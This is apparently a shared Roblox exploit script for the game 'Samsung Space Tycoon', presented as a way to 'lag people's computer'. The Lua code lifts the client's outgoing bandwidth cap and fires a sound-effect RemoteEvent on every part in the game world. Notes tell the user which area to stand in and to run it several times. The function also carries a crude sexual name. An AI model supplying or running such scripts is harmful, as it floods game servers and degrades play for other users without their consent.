MADE BY IDoN0t
FEATURES:
- LAG PEOPLE’S COMPUTER
- ㅤ
- DEV NOTE:
- You will need to go into the ‘Pink Desert’ for this to work. It might work on the other resource locations but idk
- You will also need to execute multiple times (keep in mind your ping)
GAME LINK:
SAMSUNG SPACE TYCOON
SCRIPT:
game:GetService("NetworkClient"):SetOutgoingKBPSLimit(math.huge)
local function GiveMeYourBigJuicyDick(removeClientSideLag)
for i, IDoN0t in ipairs(workspace:GetDescendants()) do
if IDoN0t:IsA("BasePart") then
game:GetService("ReplicatedStorage").SoundsManagement.Events.PlaySoundEffect:FireServer("RidingVehicles", IDoN0t)
if removeClientSideLag == true and IDoN0t:FindFirstChild("RidingVehicles") then
IDoN0t.RidingVehicles:Destroy()
end
end
end
end
-- For ppl who don't know lua
local removeClientSideLag = true
GiveMeYourBigJuicyDick(removeClientSideLag)